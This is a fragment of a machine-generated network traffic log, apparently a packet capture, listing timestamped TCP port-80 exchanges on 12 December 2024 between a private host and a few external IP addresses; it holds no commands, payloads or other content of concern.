                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.268244028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.268366098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.268476009 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.269314051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.269697905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.269928932 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.270207882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.270373106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.270498991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.271280050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.271888018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.272223949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.272342920 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.272524118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.273297071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.273384094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.273467064 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.273484945 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.274378061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.274523973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.274785995 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.275345087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.275427103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.275542021 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.276320934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.276679993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.277368069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.277378082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.277472973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.278378963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.278470993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.278589964 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.279419899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.279841900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.279932022 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.283065081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.283078909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.283083916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.283092976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.283101082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.283113003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.283205032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.283236980 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.283442974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.283529997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.283632040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.284437895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.284662962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.285420895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.285543919 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.285690069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.286467075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.286509037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.286571026 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.287575006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.287727118 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.287750006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.287851095 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.288512945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.288961887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.289072990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.289215088 CET8049951185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.289300919 CET4995180192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.289520025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.289602995 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.289917946 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.290712118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.290837049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.290966988 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.291620970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.291996956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.292088032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.292609930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.292622089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.292728901 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.293602943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.293695927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.294567108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.294675112 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.294866085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.295347929 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.295582056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.295720100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.295835972 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.296606064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.296730042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.296825886 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.297662020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.297918081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.298055887 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.298283100 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.298660040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.299746990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.299751997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.299762011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.299851894 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.299876928 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.300662041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.353446007 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.417983055 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.418446064 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.419589996 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.440295935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.440449953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.440598965 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.440618038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.440624952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.440670013 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.441595078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.441745996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.441864014 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.442661047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.443022013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.443643093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.443702936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.443718910 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.443783045 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.444613934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.444916010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.445027113 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.445712090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.445723057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.445836067 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.446675062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.446774960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.446886063 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.447683096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.447858095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.447994947 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.448693037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.448942900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.449067116 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.449712038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.450748920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.450754881 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.450766087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.450881958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.451738119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.451886892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.452059984 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.452799082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.453829050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.453835964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.453846931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.453970909 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.454790115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.455585957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.455912113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.455977917 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.455988884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.456886053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.456892014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.456940889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.458117962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.458952904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.458957911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.458969116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.459074974 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.459907055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.460925102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.460931063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.460968971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.461071014 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.461127996 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.461914062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.462090969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.462225914 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.462960005 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.463093996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.463224888 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.463952065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.464066982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.464174032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.464952946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.465754986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.465863943 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.465996027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.466002941 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.466099977 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.466964960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.467154980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.467261076 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.468049049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.468241930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.468377113 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.469011068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.469135046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.469244003 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.470010042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.470094919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.470199108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.471046925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.471090078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.471195936 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.472148895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.473048925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.473134041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.473144054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.473249912 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.474066019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.474220991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.474441051 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.475116968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.475122929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.475224972 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.476099014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.477130890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.477137089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.477206945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.477248907 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.477271080 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.478189945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.478195906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.478302002 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.479202986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.479260921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.479397058 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.480155945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.480576992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.480714083 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.481195927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.481678009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.482243061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.482251883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.482355118 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.483294010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.483304024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.483427048 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.484196901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.484939098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.485095978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.485270977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.485698938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.485826969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.486314058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.486901045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.487085104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.487237930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.487442970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.487715006 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.488389015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.488573074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.488701105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.489439964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.489531040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.489656925 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.490313053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.490622044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.491348982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.491451025 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.491905928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.492346048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.492474079 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.492974997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.493177891 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.493323088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.539469957 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.540971041 CET4994680192.168.2.10185.81.68.147
